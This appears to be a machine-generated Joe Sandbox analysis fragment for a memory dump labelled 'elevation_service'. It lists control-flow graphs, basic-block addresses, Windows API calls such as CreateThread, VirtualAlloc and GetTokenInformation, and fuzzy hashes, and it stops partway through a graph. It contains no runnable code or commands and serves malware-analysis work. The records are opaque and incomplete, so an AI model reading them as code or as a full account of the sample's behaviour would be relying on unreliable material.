                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandleInformationToken
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3954737543-0
                                                                                                                                                          • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                          • Instruction ID: 8f8efbee30ffe9c279532e85f219695513a96fffac046db4df84e06b3e075cd7
                                                                                                                                                          • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                          • Instruction Fuzzy Hash: 63F0903440D642DB8E358A5494806753BE0EF27750B6C00E9D446CB922DE28DC42E756

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:5.4%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                          Total number of Nodes:66
                                                                                                                                                          Total number of Limit Nodes:5
                                                                                                                                                          execution_graph 3862 995b8f 3873 9a53f0 3862->3873 3864 995baf 3878 9981c0 3864->3878 3866 995c2c 3867 995c84 3885 995990 3867->3885 3869 995dcd 3869->3869 3870 995d56 CreateThread 3872 995bbc 3870->3872 3871 995cd4 CreateThread CloseHandle 3871->3872 3872->3866 3872->3867 3872->3870 3872->3871 3874 9a53f4 3873->3874 3875 9a545e VirtualAlloc 3874->3875 3877 9a53f6 3874->3877 3876 9a5460 3875->3876 3876->3874 3877->3864 3880 9981e5 3878->3880 3879 99830b CloseHandle 3879->3880 3880->3879 3881 998334 3880->3881 3882 998357 GetTokenInformation 3880->3882 3883 998212 GetTokenInformation 3880->3883 3881->3872 3882->3880 3883->3880 3884 998220 3883->3884 3884->3872 3887 995994 wcscpy 3885->3887 3886 995a23 3886->3869 3887->3886 3888 995a8d VirtualAlloc 3887->3888 3888->3887 3911 9958de 3912 9a53f0 VirtualAlloc 3911->3912 3913 9958f9 3912->3913 3914 9981c0 3 API calls 3913->3914 3915 995907 3914->3915 3937 998201 3939 998220 3937->3939 3941 9981e5 3937->3941 3938 99830b CloseHandle 3938->3941 3940 998334 3941->3938 3941->3940 3942 998357 GetTokenInformation 3941->3942 3943 998212 GetTokenInformation 3941->3943 3942->3941 3943->3939 3943->3941 3889 995d50 CreateThread 3890 995bbc 3889->3890 3891 995cd4 CreateThread CloseHandle 3890->3891 3892 995c84 3890->3892 3893 995c2c 3890->3893 3896 995d56 CreateThread 3890->3896 3891->3890 3894 995990 VirtualAlloc 3892->3894 3895 995dcd 3894->3895 3895->3895 3896->3890 3916 9981e3 3920 9981e5 3916->3920 3917 998357 GetTokenInformation 3917->3920 3918 99830b CloseHandle 3918->3920 3919 998334 3920->3917 3920->3918 3920->3919 3921 998212 GetTokenInformation 3920->3921 3921->3920 3922 998220 3921->3922 3944 995d22 3945 995cd4 CreateThread CloseHandle 3944->3945 3948 995bbc 3944->3948 3945->3948 3946 995c2c 3947 995d56 CreateThread 3947->3948 3948->3945 3948->3946 3948->3947 3949 995c84 3948->3949 3950 995990 VirtualAlloc 3949->3950 3951 995dcd 3950->3951 3951->3951 3897 9983e7 3900 9981e5 3897->3900 3898 99830b CloseHandle 3898->3900 3899 998212 GetTokenInformation 3899->3900 3903 998220 3899->3903 3900->3898 3900->3899 3901 998357 GetTokenInformation 3900->3901 3902 998334 3900->3902 3901->3900

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 0 9981c0-9981d8 1 9983bf-9983ca 0->1 3 9983d0 1->3 4 998277-99827a 1->4 3->4 7 9983d6 3->7 5 99827c 4->5 6 998241 4->6 5->6 10 99827e 5->10 8 998251-998256 call 9c72f4 6->8 9 998376-99837b 6->9 18 99825b-998260 8->18 11 998381 9->11 12 9982f0-99831c 9->12 14 99830b-998311 CloseHandle 10->14 15 998284 10->15 11->12 17 998387 11->17 31 998322 12->31 32 9981e5 12->32 19 99832e-998330 14->19 15->19 17->4 20 998390-998393 17->20 18->20 21 9982dd-9982e3 19->21 22 998332 19->22 20->10 23 998399 20->23 24 9982e9 21->24 25 9983a3-9983a4 21->25 22->21 27 998334 22->27 23->10 29 99839f-9983a1 23->29 24->25 30 9982ef 24->30 28 99f524-99f52e 27->28 33 99f807 28->33 29->25 30->12 31->32 36 998328-99832c 31->36 34 9981eb 32->34 35 9982a3-9982a5 32->35 37 99f80d 33->37 38 99f8df-99f8e0 33->38 41 9981f1 34->41 42 9982b2-99836f GetTokenInformation 34->42 39 9983f9 35->39 40 9982ab 35->40 36->19 43 9982c5-9982c8 36->43 37->38 46 99f813 37->46 53 9a15a5-9a15aa 38->53 44 9983ff 39->44 45 9982d2-9982d7 39->45 40->39 47 9982b1 40->47 41->42 48 9981f7 41->48 42->9 43->39 50 9982ce 43->50 44->28 54 998306-998309 45->54 57 99f81b 46->57 58 99f78f 46->58 47->42 56 99828e 48->56 51 99828f-998303 call 9c72ec 50->51 52 9982d0 50->52 51->54 66 99834f-998355 51->66 52->45 52->51 60 9a15ae-9a15af 53->60 54->14 54->19 56->51 57->38 58->57 61 99f795 58->61 63 9a15b2-9a15b7 60->63 61->33 65 9a15ba-9a15c1 63->65 67 9a1750-9a17a2 call 9c72f4 65->67 68 9a15c7-9a15d2 65->68 73 998341 66->73 74 998212-99821a GetTokenInformation 66->74 71 9a1620-9a1623 68->71 72 9a15d4-9a15d6 68->72 75 9a16a0-9a16b4 71->75 76 9a1625-9a1628 71->76 78 9a15dc-9a15df 72->78 79 9a1670-9a1684 72->79 73->74 80 998347 73->80 85 9983af 74->85 86 998220-998234 74->86 83 9a16b6-9a16b9 75->83 84 9a16f4-9a16f5 75->84 76->65 81 9a162a-9a1636 76->81 78->65 87 9a15e1-9a15f6 78->87 79->53 82 9a168a-9a168d 79->82 91 9a1638-9a1640 80->91 92 99834d 80->92 81->91 93 9a16dc-9a16ec 81->93 95 9a172f-9a1738 82->95 96 9a1693-9a1697 82->96 97 9a173a-9a173b 83->97 98 9a16bb 83->98 99 9a16fe-9a170c 84->99 85->8 94 9983b5 85->94 111 99823a 86->111 112 9983d7-9983dd 86->112 89 9a15fc-9a1600 87->89 90 9a16d2-9a16d7 87->90 89->99 100 9a1606-9a1618 89->100 90->60 102 9a170e-9a1727 91->102 103 9a1646-9a165f 91->103 92->66 93->68 101 9a16f2 93->101 94->8 105 9983bb-9983bd 94->105 104 9a173f-9a1740 95->104 106 9a16bf-9a16cd 96->106 97->104 98->106 108 9a1744-9a1748 99->108 100->63 101->67 102->68 109 9a172d 102->109 103->68 110 9a1665 103->110 104->108 105->1 109->67 110->67 111->112 113 998240 111->113 115 9ab32e-9ab330 113->115 116 9ab332-9ab337 call 9c72f4 115->116 117 9ab300 115->117 116->117 125 9ab339 116->125 121 9ab2fd 117->121 122 9ab302 117->122 123 9ab2ff 121->123 124 9ab305 121->124 126 9ab308-9ab315 123->126 124->126 127 9ab322-9ab32d 124->127 125->117 128 9ab33b-9ab33f 125->128 126->124 130 9ab317 126->130 127->115 128->126 130->121
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000A.00000002.2859021861.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
                                                                                                                                                          • Instruction ID: 39baefc33e140fcb93515faf968af9d8390162026be8828d2141562e5b2cc3d3
                                                                                                                                                          • Opcode Fuzzy Hash: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
                                                                                                                                                          • Instruction Fuzzy Hash: F4B1263050DE458BDF29CB1D848123AB7A9FF97354F288A5DD4ABC7166DE28DC42C392

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 131 995b8f-995c20 call 9a53f0 call 9c8358 call 9b0320 call 9981c0 141 995cf4-995d08 call 9c72ec 131->141 142 995c26 131->142 146 995d0e 141->146 147 995c87-995dc8 call 995e60 call 995990 141->147 142->141 144 995c2c-995c2f 142->144 146->147 149 995d14-995d18 146->149 159 995dcd 147->159 152 995daf-995db6 call 9952d0 149->152 153 995c65 149->153 165 995dbc 152->165 166 995c30-995c39 152->166 156 995ca3 call 995df0 153->156 157 995c67 153->157 168 995c45-995d6d call 9b1520 156->168 157->156 161 995c69-995c9d 157->161 159->159 177 995c9f 161->177 178 995c85 161->178 169 995d7d-995d89 165->169 170 995dbe 165->170 180 995cb9-995cbd 166->180 181 995bf7 166->181 188 995bfd-995c06 168->188 193 995d73 168->193 182 995d8b-995d92 169->182 183 995d94 169->183 170->169 176 995d9b 170->176 184 995d9c 176->184 177->178 186 995ca1 177->186 178->147 189 995cc3 180->189 190 995d56-995d5b CreateThread 180->190 181->180 181->188 182->183 182->184 183->144 191 995cb3 183->191 195 995da5-995da8 184->195 186->156 188->195 189->190 194 995cc9 189->194 197 995d1f-995d45 190->197 198 995c7e 190->198 191->144 191->180 193->188 199 995d79-995d7b 193->199 194->190 195->152 202 995cd4-995cea CreateThread CloseHandle 197->202 203 995d47 197->203 198->197 200 995c84 198->200 199->169 200->178 202->182 205 995cf0-995d4d 202->205 203->202 205->183
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000A.00000002.2859021861.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                          • Opcode ID: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                          • Instruction ID: acc9c409bfed6f971381e37a24b597da9492e4a9f0360d1c688dd96e81bdce6a
                                                                                                                                                          • Opcode Fuzzy Hash: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                          • Instruction Fuzzy Hash: 47411920608F098FDF6BAB2C945D33B36D8EB95311F5B096AD44BCB1E5FE288C458752

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 207 995d22-995d45 208 995cd4-995cea CreateThread CloseHandle 207->208 209 995d47 207->209 211 995d8b-995d92 208->211 212 995cf0-995d4d 208->212 209->208 213 995d9c 211->213 214 995d94 211->214 212->214 217 995da5-995db6 call 9952d0 213->217 218 995c2c-995c2f 214->218 219 995cb3 214->219 230 995dbc 217->230 231 995c30-995c39 217->231 219->218 220 995cb9-995cbd 219->220 222 995cc3 220->222 223 995d56-995d5b CreateThread 220->223 222->223 226 995cc9 222->226 228 995d1f-995d45 223->228 229 995c7e 223->229 226->223 228->208 228->209 229->228 232 995c84-995dc8 call 995e60 call 995990 229->232 235 995d7d-995d89 230->235 236 995dbe 230->236 231->220 242 995bf7 231->242 250 995dcd 232->250 235->211 235->214 236->235 241 995d9b 236->241 241->213 242->220 245 995bfd-995c06 242->245 245->217 250->250
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000A.00000002.2859021861.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 738052048-0
                                                                                                                                                          • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                          • Instruction ID: e56561c007d774261732b7bccef2e4da0144bf46c666fb8970ae97739386d307
                                                                                                                                                          • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                          • Instruction Fuzzy Hash: 93F0F02061CE0586DF2F9B3C985933B62C9A799332F670F1ED097C90E4FA2889029309

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 251 995d50-995d5b CreateThread 252 995c78 251->252 253 995d1f-995d45 252->253 254 995c7e 252->254 257 995cd4-995cea CreateThread CloseHandle 253->257 258 995d47 253->258 254->253 255 995c84-995dc8 call 995e60 call 995990 254->255 276 995dcd 255->276 261 995d8b-995d92 257->261 262 995cf0-995d4d 257->262 258->257 264 995d9c 261->264 265 995d94 261->265 262->265 270 995da5-995db6 call 9952d0 264->270 271 995c2c-995c2f 265->271 272 995cb3 265->272 283 995dbc 270->283 284 995c30-995c39 270->284 272->271 275 995cb9-995cbd 272->275 278 995cc3 275->278 279 995d56-995d5b CreateThread 275->279 276->276 278->279 281 995cc9 278->281 279->252 281->279 286 995d7d-995d89 283->286 287 995dbe 283->287 284->275 292 995bf7 284->292 286->261 286->265 287->286 291 995d9b 287->291 291->264 292->275 293 995bfd-995c06 292->293 293->270
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000A.00000002.2859021861.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 738052048-0
                                                                                                                                                          • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                          • Instruction ID: 42431177af9be29fe9dc5de00db3a3f2557320f6d74cc522e1d840be51bc5390
                                                                                                                                                          • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                          • Instruction Fuzzy Hash: 64B01200028F86874C2F1F3C044812B098C2E46A359771F6C9FB7968E2E8042C446330

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 295 995990-99599b 297 9959a1 295->297 298 995a33-995a61 call 9c9b00 295->298 297->298 300 9959a7-9959ab 297->300 308 995a63 298->308 309 995ab4-995aba call 9b1080 298->309 304 995a59 300->304 305 9959b1-9959f3 call 9c2320 300->305 306 995a5b 304->306 307 995a25-995a2d 304->307 305->304 326 9959f5-9959fa 305->326 306->307 318 995a23 306->318 315 995a2f 307->315 316 995a70-995a7b 307->316 308->309 313 995a65 308->313 327 995a83-995a88 call 995df0 309->327 328 995a13 309->328 313->316 315->313 319 995a7d 316->319 320 995a16-995a1e call 9b1470 316->320 324 995a24 318->324 319->320 325 995a7f-995a81 319->325 334 995a96-995ac2 320->334 325->327 330 9959fc 326->330 331 995a51-995a54 call 9c233c 326->331 338 995a8d VirtualAlloc 327->338 328->327 333 995a15 328->333 330->331 336 9959fe-995a02 330->336 331->304 333->320 334->324 339 995ac8 334->339 336->331 338->334 339->324 340 995ace 339->340 340->298
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000A.00000002.2859021861.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: wcscpy
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1284135714-0
                                                                                                                                                          • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                          • Instruction ID: 655c549b9f886a94e7d5be0656f95a1334282e8075c07f0bc5171c697869af75
                                                                                                                                                          • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                          • Instruction Fuzzy Hash: F821D72051FE848FDF6B931C44953BB26A6B7A5324F9B07CBD086C7192C92C4D05D35E

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 342 998245-998247 343 99824d-99824f 342->343 344 9982d2-9982d7 342->344 345 998251-998260 call 9c72f4 343->345 346 998306-998309 344->346 355 998390-998393 345->355 348 99830b-998311 CloseHandle 346->348 349 99832e-998330 346->349 348->349 351 9982dd-9982e3 349->351 352 998332 349->352 353 9982e9 351->353 354 9983a3-9983a4 351->354 352->351 356 998334 352->356 353->354 360 9982ef 353->360 358 998399 355->358 359 99827e 355->359 357 99f524-99f52e 356->357 362 99f807 357->362 358->359 361 99839f-9983a1 358->361 359->348 363 998284 359->363 364 9982f0-99831c 360->364 361->354 365 99f80d 362->365 366 99f8df-99f8e0 362->366 363->349 377 998322 364->377 378 9981e5 364->378 365->366 368 99f813 365->368 369 9a15a5-9a15aa 366->369 371 99f81b 368->371 372 99f78f 368->372 373 9a15ae-9a15af 369->373 371->366 372->371 375 99f795 372->375 376 9a15b2-9a15b7 373->376 375->362 379 9a15ba-9a15c1 376->379 377->378 382 998328-99832c 377->382 380 9981eb 378->380 381 9982a3-9982a5 378->381 385 9a1750-9a17a2 call 9c72f4 379->385 386 9a15c7-9a15d2 379->386 387 9981f1 380->387 388 9982b2-99836f GetTokenInformation 380->388 383 9983f9 381->383 384 9982ab 381->384 382->349 389 9982c5-9982c8 382->389 383->344 390 9983ff 383->390 384->383 391 9982b1 384->391 393 9a1620-9a1623 386->393 394 9a15d4-9a15d6 386->394 387->388 395 9981f7-99828e 387->395 407 998376-99837b 388->407 389->383 397 9982ce 389->397 390->357 391->388 400 9a16a0-9a16b4 393->400 401 9a1625-9a1628 393->401 403 9a15dc-9a15df 394->403 404 9a1670-9a1684 394->404 398 99828f-998303 call 9c72ec 395->398 397->398 399 9982d0 397->399 398->346 435 99834f-998355 398->435 399->344 399->398 410 9a16b6-9a16b9 400->410 411 9a16f4-9a16f5 400->411 401->379 406 9a162a-9a1636 401->406 403->379 412 9a15e1-9a15f6 403->412 404->369 409 9a168a-9a168d 404->409 415 9a1638-9a1640 406->415 416 9a16dc-9a16ec 406->416 407->364 417 998381 407->417 419 9a172f-9a1738 409->419 420 9a1693-9a1697 409->420 421 9a173a-9a173b 410->421 422 9a16bb 410->422 423 9a16fe-9a170c 411->423 413 9a15fc-9a1600 412->413 414 9a16d2-9a16d7 412->414 413->423 424 9a1606-9a1618 413->424 414->373 426 9a170e-9a1727 415->426 427 9a1646-9a165f 415->427 416->386 425 9a16f2 416->425 417->364 428 998387 417->428 429 9a173f-9a1740 419->429 431 9a16bf-9a16cd 420->431 421->429 422->431 432 9a1744-9a1748 423->432 424->376 425->385 426->386 433 9a172d 426->433 427->386 434 9a1665 427->434 428->355 436 998277-99827a 428->436 429->432 433->385 434->385 440 998341 435->440 441 998212-99821a GetTokenInformation 435->441 438 99827c 436->438 439 998241 436->439 438->359 438->439 439->345 439->407 440->441 442 998347 440->442 443 9983af 441->443 444 998220-998234 441->444 442->415 446 99834d 442->446 443->345 447 9983b5 443->447 451 99823a 444->451 452 9983d7-9983dd 444->452 446->435 447->345 448 9983bb-9983ca 447->448 448->436 457 9983d0 448->457 451->452 453 998240 451->453 456 9ab32e-9ab330 453->456 458 9ab332-9ab337 call 9c72f4 456->458 459 9ab300 456->459 457->436 460 9983d6 457->460 458->459 468 9ab339 458->468 464 9ab2fd 459->464 465 9ab302 459->465 466 9ab2ff 464->466 467 9ab305 464->467 469 9ab308-9ab315 466->469 467->469 470 9ab322-9ab32d 467->470 468->459 471 9ab33b-9ab33f 468->471 469->467 473 9ab317 469->473 470->456 471->469 473->464
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000A.00000002.2859021861.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                          • Opcode ID: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                          • Instruction ID: d94446af1396888a6581757143bab7780411ceaaf94c390b59d46c2bbfe0cd57
                                                                                                                                                          • Opcode Fuzzy Hash: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                          • Instruction Fuzzy Hash: 67F0F43451DA518FCE66871D907153FEBA8AF83740B69049EE447CB512CE18DC01D352

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 605 9983e7-9983e9 606 9983ef 605->606 607 9982c5-9982c8 605->607 606->607 608 9983f5-9983f7 606->608 609 9983f9 607->609 610 9982ce 607->610 608->609 613 9983ff 609->613 614 9982d2-9982d7 609->614 611 99828f-998303 call 9c72ec 610->611 612 9982d0 610->612 617 998306-998309 611->617 629 99834f-998355 611->629 612->611 612->614 615 99f524-99f52e 613->615 614->617 618 99f807 615->618 620 99830b-998311 CloseHandle 617->620 621 99832e-998330 617->621 622 99f80d 618->622 623 99f8df-99f8e0 618->623 620->621 625 9982dd-9982e3 621->625 626 998332 621->626 622->623 630 99f813 622->630 634 9a15a5-9a15aa 623->634 627 9982e9 625->627 628 9983a3-9983a4 625->628 626->625 631 998334 626->631 627->628 632 9982ef 627->632 636 998341 629->636 637 998212-99821a GetTokenInformation 629->637 638 99f81b 630->638 639 99f78f 630->639 631->615 642 9982f0-99831c 632->642 640 9a15ae-9a15af 634->640 636->637 641 998347 636->641 645 9983af 637->645 646 998220-998234 637->646 638->623 639->638 643 99f795 639->643 644 9a15b2-9a15b7 640->644 648 9a1638-9a1640 641->648 649 99834d 641->649 674 998322 642->674 675 9981e5 642->675 643->618 653 9a15ba-9a15c1 644->653 651 998251-998256 call 9c72f4 645->651 652 9983b5 645->652 669 99823a 646->669 670 9983d7-9983dd 646->670 654 9a170e-9a1727 648->654 655 9a1646-9a165f 648->655 649->629 663 99825b-998260 651->663 652->651 657 9983bb-9983ca 652->657 658 9a1750-9a17a2 call 9c72f4 653->658 659 9a15c7-9a15d2 653->659 654->659 661 9a172d 654->661 655->659 662 9a1665 655->662 705 9983d0 657->705 706 998277-99827a 657->706 667 9a1620-9a1623 659->667 668 9a15d4-9a15d6 659->668 661->658 662->658 673 998390-998393 663->673 671 9a16a0-9a16b4 667->671 672 9a1625-9a1628 667->672 677 9a15dc-9a15df 668->677 678 9a1670-9a1684 668->678 669->670 681 998240 669->681 686 9a16b6-9a16b9 671->686 687 9a16f4-9a16f5 671->687 672->653 682 9a162a-9a1636 672->682 679 998399 673->679 680 99827e 673->680 674->675 689 998328-99832c 674->689 684 9981eb 675->684 685 9982a3-9982a5 675->685 677->653 690 9a15e1-9a15f6 677->690 678->634 683 9a168a-9a168d 678->683 679->680 693 99839f-9983a1 679->693 680->620 702 998284 680->702 694 9ab32e-9ab330 681->694 682->648 695 9a16dc-9a16ec 682->695 696 9a172f-9a1738 683->696 697 9a1693-9a1697 683->697 703 9981f1 684->703 704 9982b2-99836f GetTokenInformation 684->704 685->609 698 9982ab 685->698 699 9a173a-9a173b 686->699 700 9a16bb 686->700 707 9a16fe-9a170c 687->707 689->607 689->621 691 9a15fc-9a1600 690->691 692 9a16d2-9a16d7 690->692 691->707 708 9a1606-9a1618 691->708 692->640 693->628 709 9ab332-9ab337 call 9c72f4 694->709 710 9ab300 694->710 695->659 714 9a16f2 695->714 715 9a173f-9a1740 696->715 711 9a16bf-9a16cd 697->711 698->609 712 9982b1 698->712 699->715 700->711 702->621 703->704 718 9981f7 703->718 721 998376-99837b 704->721 705->706 719 9983d6 705->719 716 99827c 706->716 717 998241 706->717 723 9a1744-9a1748 707->723 708->644 709->710 732 9ab339 709->732 727 9ab2fd 710->727 728 9ab302 710->728 712->704 714->658 715->723 716->680 716->717 717->651 717->721 724 99828e 718->724 721->642 725 998381 721->725 724->611 725->642 731 998387 725->731 729 9ab2ff 727->729 730 9ab305 727->730 733 9ab308-9ab315 729->733 730->733 734 9ab322-9ab32d 730->734 731->673 731->706 732->710 735 9ab33b-9ab33f 732->735 733->730 737 9ab317 733->737 734->694 735->733 737->727
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000A.00000002.2859021861.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                          • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                          • Instruction ID: 60e192b49798a9d5bcc22fe71543ea4703616afd0ee9c71774501148c4b05738
                                                                                                                                                          • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                          • Instruction Fuzzy Hash: E7F0903551CA418B9E75871C8461A3FA76CAB537C0B6C489DD467CB522CE28DC42E752

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 474 998318-99831c 475 998322 474->475 476 9981e5 474->476 475->476 479 998328-99832c 475->479 477 9981eb 476->477 478 9982a3-9982a5 476->478 482 9981f1 477->482 483 9982b2-99836f GetTokenInformation 477->483 480 9983f9 478->480 481 9982ab 478->481 484 99832e-998330 479->484 485 9982c5-9982c8 479->485 486 9983ff 480->486 487 9982d2-9982d7 480->487 481->480 488 9982b1 481->488 482->483 489 9981f7-99828e 482->489 504 998376-99837b 483->504 491 9982dd-9982e3 484->491 492 998332 484->492 485->480 493 9982ce 485->493 496 99f524-99f52e 486->496 499 998306-998309 487->499 488->483 494 99828f-998303 call 9c72ec 489->494 497 9982e9 491->497 498 9983a3-9983a4 491->498 492->491 501 998334 492->501 493->494 495 9982d0 493->495 494->499 517 99834f-998355 494->517 495->487 495->494 503 99f807 496->503 497->498 502 9982ef 497->502 499->484 506 99830b-998311 CloseHandle 499->506 501->496 508 9982f0-99831c 502->508 510 99f80d 503->510 511 99f8df-99f8e0 503->511 507 998381 504->507 504->508 506->484 507->508 513 998387 507->513 508->475 508->476 510->511 515 99f813 510->515 516 9a15a5-9a15aa 511->516 518 998390-998393 513->518 519 998277-99827a 513->519 524 99f81b 515->524 525 99f78f 515->525 526 9a15ae-9a15af 516->526 530 998341 517->530 531 998212-99821a GetTokenInformation 517->531 521 998399 518->521 522 99827e 518->522 527 99827c 519->527 528 998241 519->528 521->522 532 99839f-9983a1 521->532 522->506 536 998284 522->536 524->511 525->524 534 99f795 525->534 535 9a15b2-9a15b7 526->535 527->522 527->528 528->504 533 998251-998260 call 9c72f4 528->533 530->531 537 998347 530->537 540 9983af 531->540 541 998220-998234 531->541 532->498 533->518 534->503 539 9a15ba-9a15c1 535->539 536->484 543 9a1638-9a1640 537->543 544 99834d 537->544 547 9a1750-9a17a2 call 9c72f4 539->547 548 9a15c7-9a15d2 539->548 540->533 545 9983b5 540->545 564 99823a 541->564 565 9983d7-9983dd 541->565 549 9a170e-9a1727 543->549 550 9a1646-9a165f 543->550 544->517 545->533 551 9983bb-9983ca 545->551 553 9a1620-9a1623 548->553 554 9a15d4-9a15d6 548->554 549->548 558 9a172d 549->558 550->548 559 9a1665 550->559 551->519 587 9983d0 551->587 556 9a16a0-9a16b4 553->556 557 9a1625-9a1628 553->557 562 9a15dc-9a15df 554->562 563 9a1670-9a1684 554->563 568 9a16b6-9a16b9 556->568 569 9a16f4-9a16f5 556->569 557->539 566 9a162a-9a1636 557->566 558->547 559->547 562->539 570 9a15e1-9a15f6 562->570 563->516 567 9a168a-9a168d 563->567 564->565 573 998240 564->573 566->543 574 9a16dc-9a16ec 566->574 575 9a172f-9a1738 567->575 576 9a1693-9a1697 567->576 578 9a173a-9a173b 568->578 579 9a16bb 568->579 581 9a16fe-9a170c 569->581 571 9a15fc-9a1600 570->571 572 9a16d2-9a16d7 570->572 571->581 582 9a1606-9a1618 571->582 572->526 584 9ab32e-9ab330 573->584 574->548 583 9a16f2 574->583 585 9a173f-9a1740 575->585 586 9a16bf-9a16cd 576->586 578->585 579->586 588 9a1744-9a1748 581->588 582->535 583->547 589 9ab332-9ab337 call 9c72f4 584->589 590 9ab300 584->590 585->588 587->519 591 9983d6 587->591 589->590 599 9ab339 589->599 595 9ab2fd 590->595 596 9ab302 590->596 597 9ab2ff 595->597 598 9ab305 595->598 600 9ab308-9ab315 597->600 598->600 601 9ab322-9ab32d 598->601 599->590 602 9ab33b-9ab33f 599->602 600->598 604 9ab317 600->604 